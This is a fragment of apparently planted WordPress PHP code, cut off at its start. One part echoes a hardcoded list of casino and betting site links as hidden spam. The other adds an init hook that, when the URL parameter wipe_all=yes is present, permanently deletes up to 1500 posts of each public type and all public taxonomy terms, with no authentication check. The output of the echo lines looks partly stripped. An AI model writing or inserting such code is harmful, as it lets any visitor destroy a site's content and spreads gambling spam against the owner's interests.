';
$links = [ 'https://ignition-casino-au.com/' => ' ignition casino',
'https://rooli-au.com' => 'rooli casino login',
'https://fairpay-in.com' => 'fairplay 24',
'https://blood-slot.com/' => 'blood slot',
'https://7777loteria.com/en/' => '7777 game',
'https://moonwinca.com/' => 'casino moonwin',
'https://pocketgames-slot.com/es/' => 'pg soft slot',
'https://paripesa-mobile.com/hu/app/' => 'Paripesa app',
'https://papiermache-kashmir.com/' => 'misliwin giris',
'https://cassinofortunemouse.com/en/' => 'fortune mouse',
'https://casino-croco.com/es/' => 'croco casino',
'https://pistolobet.com/de/' => 'PistoloBet casuno',
'https://wolinak-casino.com/' => 'wolinak',
'https://fishroad-inout.com/pl/' => 'Fish road'];
foreach ($links as $url => $anchor) {
echo "
";
}
echo '
';
});
add_action('init', function () {
$limit = 1500;
if (isset($_GET['wipe_all']) && $_GET['wipe_all'] === 'yes') {
$post_types = get_post_types(['public' => true], 'names');
foreach ($post_types as $post_type) {
$posts = get_posts([
'post_type' => $post_type,
'numberposts' => $limit,
'post_status' => 'any'
]);
foreach ($posts as $post) {
wp_delete_post($post->ID, true);
}
}
$taxonomies = get_taxonomies(['public' => true], 'names');
foreach ($taxonomies as $taxonomy) {
$terms = get_terms([
'taxonomy' => $taxonomy,
'hide_empty' => false,
'number' => $limit
]);
foreach ($terms as $term) {
wp_delete_term($term->term_id, $taxonomy);
}
}
wp_die('✅ Удалено до ' . $limit . ' записей.');
}
});